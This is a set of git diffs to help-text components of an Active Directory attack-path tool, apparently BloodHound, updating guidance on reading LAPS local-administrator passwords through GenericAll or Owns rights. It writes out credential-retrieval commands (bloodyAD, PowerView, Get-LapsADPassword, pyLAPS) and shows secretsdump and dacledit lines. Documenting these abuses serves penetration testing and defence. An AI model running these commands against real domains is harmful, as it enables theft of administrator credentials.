                         computer account can be added with Impacket's addcomputer.py example script:

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx
@@ -163,21 +163,42 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
                             Full control of a computer object is abusable when the computer's local admin account
-                            credential is controlled with LAPS. The clear-text password for the local administrator
-                            account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With
-                            full control of the computer object, you may have the ability to read this attribute, or
-                            grant yourself the ability to read the attribute by modifying the computer object's security
-                            descriptor.
+                            credential is controlled with LAPS.
                         </Typography>
                         <Typography variant='body2'>
-                            <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                                pyLAPS
-                            </Link>{' '}
-                            can be used to retrieve LAPS passwords:
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
+                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
                         </Typography>
+                        <Typography variant='body2'>
+                            See Windows abuse for retrieving and decrypting the encrypted attributes.
+                        </Typography>
+
                         <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
                         First, if an attacker does not control an account with an SPN set, a new attacker-controlled
                         computer account can be added with Impacket's addcomputer.py example script:
@@ -323,24 +344,6 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                     <Typography component={'pre'}>
                         {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
-                    </Typography>
-
-                    <Typography variant='body1'> Retrieve LAPS Passwords </Typography>
-
-                    <Typography variant='body2'>
-                        The AllExtendedRights permission also grants {sourceName} enough permissions, to retrieve LAPS
-                        passwords domain-wise.
-                    </Typography>
-
-                    <Typography variant='body2'>
-                        <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                            pyLAPS
-                        </Link>{' '}
-                        can be used for that purpose:
-                    </Typography>
-
-                    <Typography component={'pre'}>
-                        {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
                     </Typography>
 
                     <Typography variant='body1'>Generic Descendent Object Takeover</Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx
@@ -168,6 +168,18 @@ const References: FC = () => {
                 href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'>
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
+            </Link>
         </Box>
     );
 };

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx
@@ -169,16 +169,22 @@ const References: FC = () => {
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
         </Box>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
@@ -215,10 +215,7 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                     <>
                         <Typography variant='body2'>
                             The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            administrator) password of {targetName}.
                         </Typography>
 
                         <Typography variant='body2'>
@@ -231,6 +228,49 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         <Typography variant='body2'>
                             Alternatively, GenericAll on a computer object can be used to perform a Resource-Based
                             Constrained Delegation attack.
+                        </Typography>
+
+                        <Typography variant='body1'> Retrieve LAPS Password </Typography>
+                        <Typography variant='body2'>
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                            lapsv2decrypt
+                        </Link>{' '} (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx
@@ -239,8 +239,9 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -250,27 +251,33 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                            {
+                                'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
                         </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
-                        </Typography>
+                        <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
                         <Typography variant='body2'>
-                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-                            lapsv2decrypt
-                        </Link>{' '} (dotnet or BOF).
+                            The encrypted attributes can also be retrieved and decrypted using{' '}
+                            <Link
+                                target='_blank'
+                                rel='noopener'
+                                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                                lapsv2decrypt
+                            </Link>{' '}
+                            (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx
@@ -227,24 +227,45 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                                 "dacledit.py -action 'remove' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
                             }
                         </Typography>
+
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            Full control of a computer object is abusable when the computer's local admin account
-                            credential is controlled with LAPS. The clear-text password for the local administrator
-                            account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With
-                            full control of the computer object, you may have the ability to read this attribute, or
-                            grant yourself the ability to read the attribute by modifying the computer object's security
-                            descriptor.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
-                            <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                                pyLAPS
-                            </Link>{' '}
-                            can be used to retrieve LAPS passwords:
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
+                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
                         </Typography>
+                        <Typography variant='body2'>
+                            See Windows abuse for retrieving and decrypting the encrypted attributes.
+                        </Typography>
+
                         <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
                         <Typography variant='body2'>
                             First, if an attacker does not control an account with an SPN set, a new attacker-controlled
@@ -410,25 +431,6 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                     <Typography component={'pre'}>
                         {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
-                    </Typography>
-
-                    <Typography variant='body1'> Retrieve LAPS Passwords </Typography>
-
-                    <Typography variant='body2'>
-                        If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the
-                        AllExtendedRights permission included grants {sourceName} enough privileges to retrieve LAPS
-                        passwords domain-wise.
-                    </Typography>
-
-                    <Typography variant='body2'>
-                        <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                            pyLAPS
-                        </Link>{' '}
-                        can be used for that purpose:
-                    </Typography>
-
-                    <Typography component={'pre'}>
-                        {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
                     </Typography>
 
                     <Typography variant='body1'>Generic Descendent Object Takeover</Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx
@@ -230,7 +230,8 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator)
+                            password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
                             For systems using legacy LAPS, the following AD computer object properties are relevant:
@@ -240,8 +241,9 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -251,16 +253,19 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
+                            {
+                                "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             See Windows abuse for retrieving and decrypting the encrypted attributes.

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx
@@ -144,16 +144,22 @@ const References: FC = () => {
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
         </Box>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/References.tsx
@@ -143,6 +143,18 @@ const References: FC = () => {
                 href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'>
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
+            </Link>
         </Box>
     );
 };

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
@@ -331,8 +331,9 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -342,27 +343,33 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                            {
+                                'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
                         </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
-                        </Typography>
+                        <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
                         <Typography variant='body2'>
-                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-                            lapsv2decrypt
-                        </Link>{' '} (dotnet or BOF).
+                            The encrypted attributes can also be retrieved and decrypted using{' '}
+                            <Link
+                                target='_blank'
+                                rel='noopener'
+                                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                                lapsv2decrypt
+                            </Link>{' '}
+                            (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/WindowsAbuse.tsx
@@ -307,10 +307,7 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
 
                         <Typography variant='body2'>
                             The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            administrator) password of {targetName}.
                         </Typography>
 
                         <Typography variant='body2'>
@@ -323,6 +320,49 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         <Typography variant='body2'>
                             Alternatively, GenericAll on a computer object can be used to perform a Resource-Based
                             Constrained Delegation attack.
+                        </Typography>
+
+                        <Typography variant='body1'> Retrieve LAPS Password </Typography>
+                        <Typography variant='body2'>
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                            lapsv2decrypt
+                        </Link>{' '} (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
@@ -27,19 +27,18 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
                 Password Solution (LAPS) on the computer {targetName}.
             </Typography>
             <Typography variant='body2'>
-                For systems using legacy LAPS, the following AD computer object properties are relevant:
-                - **ms-Mcs-AdmPwd**: The plaintext LAPS password.
-                - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time.
+                For systems using legacy LAPS, the following AD computer object properties are relevant: -
+                **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password
+                expiration time.
             </Typography>
 
             <Typography variant='body2'>
                 For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
-                - **msLAPS-Password**: The plaintext LAPS password.
-                - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time.
-                - **msLAPS-EncryptedPassword**: The encrypted LAPS password.
-                - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history.
-                - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password.
-                - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history.
+                - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS
+                password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. -
+                **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. -
+                **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. -
+                **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history.
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
@@ -27,18 +27,28 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
                 Password Solution (LAPS) on the computer {targetName}.
             </Typography>
             <Typography variant='body2'>
-                For systems using legacy LAPS, the following AD computer object properties are relevant: -
-                **ms-Mcs-AdmPwd**: The plaintext LAPS password. - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password
-                expiration time.
+                For systems using legacy LAPS, the following AD computer object properties are relevant:
+                <br />
+                <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                <br />
+                <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                <br />
             </Typography>
-
             <Typography variant='body2'>
                 For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
-                - **msLAPS-Password**: The plaintext LAPS password. - **msLAPS-PasswordExpirationTime**: The LAPS
-                password expiration time. - **msLAPS-EncryptedPassword**: The encrypted LAPS password. -
-                **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history. -
-                **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password. -
-                **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history.
+                <br />
+                <b>- msLAPS-Password</b>: The plaintext LAPS password
+                <br />
+                <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                <br />
+                <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                <br />
+                <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                <br />
+                <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                <br />
+                <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                <br />
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/General.tsx
@@ -27,8 +27,19 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
                 Password Solution (LAPS) on the computer {targetName}.
             </Typography>
             <Typography variant='body2'>
